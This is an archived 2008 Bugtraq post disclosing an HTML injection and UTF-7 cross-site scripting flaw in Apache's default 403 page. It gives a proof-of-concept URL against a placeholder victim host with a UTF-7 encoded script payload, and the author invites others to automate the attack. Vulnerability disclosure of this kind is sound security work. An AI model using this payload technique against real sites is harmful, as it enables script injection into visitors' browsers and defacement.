Home page logo
/

bugtraq logo Bugtraq mailing list archives

Apache Server HTML Injection and UTF-7 XSS Vulnerability
From: "lament hero" <lament.hero () gmail com>
Date: Fri, 9 May 2008 02:13:21 +0300

Apache Server HTML Injection and UTF-7 XSS Vulnerability

This vulnerability was found by Yaniv Miron and Yossi Yakubov.
This vulnerability will allow an attacker to inject an XSS to any
Apache server that use the Forbidden 403 default page.

After injecting this string:
http://www.victim.com/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqzbX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblMXsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYeOgc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('xss')+ADw-/script+AD4---//--

You will get a Forbidden 403 error message with an XSS alert.
This string is combined from HTML Injection and a XSS string coded in UTF-7.

This is only a PoC and because of that the browser should be in auto
select mode of encoding so it could use the UTF-7 encoding.

This attack had been tested on some Apache versions as 2.2.x and 1.3.x
and on some versions of FireFox up to version 2.0.0.x and in IE 6 and
7.

We leave it to other hackers to upgrade the attack and make it fully automatic.

Yaniv Miron aka "Lament".


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault